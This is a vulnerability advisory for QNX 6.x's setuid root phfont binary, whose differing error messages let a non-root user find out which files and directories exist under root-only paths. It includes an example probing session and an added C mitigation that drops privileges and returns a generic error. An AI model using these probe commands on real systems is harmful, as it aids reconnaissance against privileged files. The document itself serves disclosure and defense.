#
# QNX 6.x phfont file and directory enumeration vulnerability by cenobyte 2014
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# The setuid root binary /usr/photon/bin/phfont on QNX allows any non-root
# user to enumerate files and directories as root, because the error messages
# from PfAttachLocalDllArgv() differ depending on the path given.
#
# You can discover files and directories by observing the following error
# messages and behaviour:
#
# 1) "PfAttachLocalDllArgv(): Function not implemented"
#    A file exists.
# 2) "PfAttachLocalDllArgv(): No such file or directory"
#    A directory does not exist.
# 3) Nothing is returned when a directory exists.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.0
#
# - not vulnerable:
# QNX 6.3.0
#
# - example session:
$ id
uid=100(user) gid=100
$ /usr/photon/bin/phfont -A -d /root/.ph
$ /usr/photon/bin/phfont -A -d /root/doesnotexist
$ PfAttachLocalDllArgv(): No such file or directory
$ /usr/photon/bin/phfont -A -d /root/.profile
$ PfAttachLocalDllArgv(): Function not implemented
# ls -l /root
total 13
drwx------ 5 root root 1024 Jan 07 16:24 .
drwxr-xr-x 16 root root 1024 Oct 09 15:03 ..
-rw-rw-r-- 1 root root 51 Jan 24 01:15 .lastlogin
drwx------ 3 root root 1024 Sep 26 18:03 .mozilla
drwxrwxr-x 3 root root 1024 Sep 27 15:36 .ph
-rw-r--r-- 1 root root 191 Apr 20 2001 .profile
drwx------ 2 root root 1024 Sep 26 18:11 .ssh
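#
# - added example (not part of the original advisory, and not QNX or phfont
# code): one way a setuid root program can avoid this kind of path oracle.
# The helper name open_dir_as_caller and the message text are hypothetical;
# the code assumes a POSIX system with seteuid() and O_DIRECTORY.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L /* for O_DIRECTORY and seteuid() */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* One message for every failure, so the caller cannot tell "missing" from
 * "exists but is a file" from "permission denied". */
static const char GENERIC_ERR[] = "cannot use DLL directory";

/* Hypothetical helper: open a user-supplied directory with the caller's own
 * privileges. Returns an fd >= 0 with *msg == NULL, or -1 with *msg set to
 * GENERIC_ERR. */
int open_dir_as_caller(const char *path, const char **msg)
{
    uid_t saved = geteuid(); /* root when the binary is installed setuid root */
    int fd;

    *msg = GENERIC_ERR;
    /* Drop to the real uid before the path is resolved, so the kernel's
     * permission checks apply to the invoking user instead of root. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* errno (ENOENT, ENOTDIR, EACCES, ...) is deliberately never reported. */
    fd = open(path, O_RDONLY | O_DIRECTORY);
    if (seteuid(saved) != 0) { /* could not restore privileges: fail closed */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0)
        return -1;
    *msg = NULL;
    return fd;
}

int main(int argc, char **argv)
{
    const char *msg;
    int fd = open_dir_as_caller(argc > 1 ? argv[1] : ".", &msg);

    if (fd < 0) { fprintf(stderr, "%s\n", msg); return 1; }
    close(fd);
    return 0;
}
```

# With the path resolved under the real uid, a directory such as /root with
# mode drwx------ fails the same way for every name beneath it.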